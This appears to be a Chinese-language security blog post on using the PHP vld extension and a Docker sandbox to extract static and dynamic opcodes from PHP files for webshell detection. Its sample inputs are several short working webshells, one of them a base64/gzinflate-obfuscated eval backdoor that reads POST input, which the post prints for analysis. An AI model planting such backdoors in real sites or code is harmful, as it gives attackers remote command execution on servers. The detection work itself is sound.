cdxy.me
Cyber Security / Data Science / Trading

PHP OPCODE

vld插件

Compile & install from vld source.

apt-get install php7.0-dev
wget http://pecl.php.net/get/vld-0.14.0.tgz
tar -xzvf vld-0.14.0.tgz 
cd vld-0.14.0/
cat README.rst 
which php-config
phpize
./configure --with-php-config=/usr/bin/php-config --enable-vld
make && make install

Activate vld extension

php --ini
vi /etc/php/7.0/cli/php.ini
service apache2 restart
php -dvld.active=1 -dvld.execute=0 phpinfo.php

静态opcode

Extract opcode from phpfile.

root@iZuf6j6dqpyhy2b4on2e0sZ:/var/www/html# cat shell.php
<?php

echo system($_GET['cdxy']);
root@iZuf6j6dqpyhy2b4on2e0sZ:/var/www/html# php -dvld.active=1 -dvld.execute=0 shell.php
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /var/www/html/shell.php
function name:  (null)
number of ops:  7
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   3     0  E >   INIT_FCALL                                               'system'
         1        FETCH_R                      global              $0      '_GET'
         2        FETCH_DIM_R                                      $1      $0, 'cdxy'
         3        SEND_VAR                                                 $1
         4        DO_ICALL                                         $2      
         5        ECHO                                                     $2
   4     6      > RETURN                                                   1

branch: #  0; line:     3-    4; sop:     0; eop:     6; out1:  -2
path #1: 0, 

  • 静态提取opcode到文件的脚本
# !/usr/bin/env python
#  -*- coding: utf-8 -*-
import re
import sys
import os
import commands
import hashlib


def get_opcode(file_path):
    cmd = "php -dvld.active=1 -dvld.execute=0 " + file_path
    output = commands.getoutput(cmd)
    return re.findall(r'\d+[\s\*\>]+([A-Z_]{2,})\s', output)


def load_files_opcode_re(target_dir, output_dir):
    for path, d, filelist in os.walk(target_dir):
        for filename in filelist:
            if filename.endswith('.php'):
                fullpath = os.path.join(path, filename)
                file_md5 = hashlib.md5(fullpath).hexdigest()
                opcode = ' '.join(get_opcode(fullpath))
                with open(os.path.join(output_dir, file_md5 + '.opcode'), 'w') as output:
                    output.write(opcode)


if __name__ == '__main__':
    load_files_opcode_re(sys.argv[1], sys.argv[2])

动态opcode

动态opcode/沙箱的必要性在于识别编码、混淆、加密的webshell。

例子

原始webshell代码如下,如果不动态解码执行,无法判定进入eval的函数中是否包含可控输入点。

<?php
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));
?>

静态opcode结果

root@iZuf6j6dqpyhy2b4on2e0sZ:~/webshell_predict/webshell_bypass# cat base64.php <?php
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));
?>
root@iZuf6j6dqpyhy2b4on2e0sZ:~/webshell_predict/webshell_bypass# opcode base64.php 
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /root/webshell_predict/webshell_bypass/base64.php
function name:  (null)
number of ops:  8
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   INIT_FCALL                                               'gzinflate'
         1        INIT_FCALL                                               'base64_decode'
         2        SEND_VAL                                                 'Sy1LzNFQiQ%2FwDw6JVq8qLc5IzUtXj9W0BgA%3D'
         3        DO_ICALL                                         $0      
         4        SEND_VAR                                                 $0
         5        DO_ICALL                                         $1      
         6        INCLUDE_OR_EVAL                                          $1, EVAL
   4     7      > RETURN                                                   1

branch: #  0; line:     2-    4; sop:     0; eop:     7; out1:  -2
path #1: 0, 

动态opcode结果

root@iZuf6j6dqpyhy2b4on2e0sZ:~/webshell_predict/webshell_bypass# oprun base64.php 
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /root/webshell_predict/webshell_bypass/base64.php
function name:  (null)
number of ops:  8
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   INIT_FCALL                                               'gzinflate'
         1        INIT_FCALL                                               'base64_decode'
         2        SEND_VAL                                                 'Sy1LzNFQiQ%2FwDw6JVq8qLc5IzUtXj9W0BgA%3D'
         3        DO_ICALL                                         $0      
         4        SEND_VAR                                                 $0
         5        DO_ICALL                                         $1      
         6        INCLUDE_OR_EVAL                                          $1, EVAL
   4     7      > RETURN                                                   1

branch: #  0; line:     2-    4; sop:     0; eop:     7; out1:  -2
path #1: 0, 
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code
function name:  (null)
number of ops:  4
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   1     0  E >   FETCH_R                      global              $0      '_POST'
         1        FETCH_DIM_R                                      $1      $0, 'zusheng'
         2        INCLUDE_OR_EVAL                                          $1, EVAL
         3      > RETURN                                                   null

branch: #  0; line:     1-    1; sop:     0; eop:     3; out1:  -2
path #1: 0, 
PHP Notice:  Undefined index: zusheng in /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code on line 1

Notice: Undefined index: zusheng in /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code on line 1

可以看到php在error之前抛出的opcode,其中我们已经看到了global变量POST,根据执行流可直接判定为小马。

沙箱

  1. 由于执行的是不可信代码,考虑到php对系统的破坏性,需要具有快照功能的隔离环境。
  2. 由于代码中可能的死循环或破坏性攻击等问题,需要加入超时逻辑。
  3. 输入为本地文件,输出为文件对应的动态opcode。

基于docker的沙箱

环境

apt-get install docker.io

依赖docker的虚拟化能力,将php环境和vld插件制作Dockerfile。

mkdir docker
cd docker 
vi Dockerfile

Dockerfile内容如下

FROM ubuntu:16.04
RUN apt-get update && apt-get -y install php7.0-dev wget \
    && wget http://pecl.php.net/get/vld-0.14.0.tgz \ 
    && tar -xzvf vld-0.14.0.tgz \
    && cd vld-0.14.0 \ 
    && phpize \
    && ./configure --with-php-config=/usr/bin/php-config --enable-vld \ 
    && make && make install \
    && echo "extension=vld.so" >> /etc/php/7.0/cli/php.ini
CMD php -dvld.active=1 -dvld.execute=1 /file/1.php

RUN 命令构建环境、CMD 命令表示运行时对/file/1.php进行动态opcode提取。

构建image

docker build -t php_vld .
root@iZj6ccwgu73ligyn42bic9Z:~/docker# docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
php_vld             latest              458eeb23f1a8        15 minutes ago      452 MB
ubuntu              16.04               20c44cd7596f        3 weeks ago         123 MB

运行

这里我们每次在image运行的时候挂载不同的本地文件(webshell文件)到/file/1.php即可,同时需要加-it参数获取image输出。

root@iZj6ccwgu73ligyn42bic9Z:~/docker# docker run -it -v /root/docker/shell.php:/file/1.php php_vld
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /file/1.php
function name:  (null)
number of ops:  4
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   1     0  E >   FETCH_R                      global              $0      '_GET'
         1        FETCH_DIM_R                                      $1      $0, 1
         2        INCLUDE_OR_EVAL                                          $1, EVAL
   2     3      > RETURN                                                   1

branch: #  0; line:     1-    2; sop:     0; eop:     3; out1:  -2
path #1: 0, 
PHP Notice:  Undefined offset: 1 in /file/1.php on line 1

此外为了设置沙箱的超时逻辑,在自动化脚本中通过Popen起动上述linux命令,同时设定超时阈值。

def get_opcode_raw(abs_path):
    return sys_command_outstatuserr('docker run -it -v {}:/file/1.php php_vld'.format(abs_path))


def sys_command_outstatuserr(cmd, timeout=1):
    p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
    t_beginning = time.time()
    while True:
        if p.poll() is not None:
            res = p.communicate()
            # exitcode = p.poll() if p.poll() else 0
            return res[0]  # , exitcode, res[1]
        seconds_passed = time.time() - t_beginning
        if timeout and seconds_passed > timeout:
            p.terminate()
            # out, exitcode, err = '', 128, 'timeout'
            return 'timeout'
        time.sleep(0.1)

此外在加上一层递归遍历路径、输入输出,完成批量提取数据。

def run(abs_dir):
    for path, d, filelist in os.walk(abs_dir):
        for filename in filelist:
            fullpath = os.path.join(path, filename)
            ans = get_opcode_raw(fullpath)
            print ans

经测试以上py脚本单进程平均每秒处理3个文件。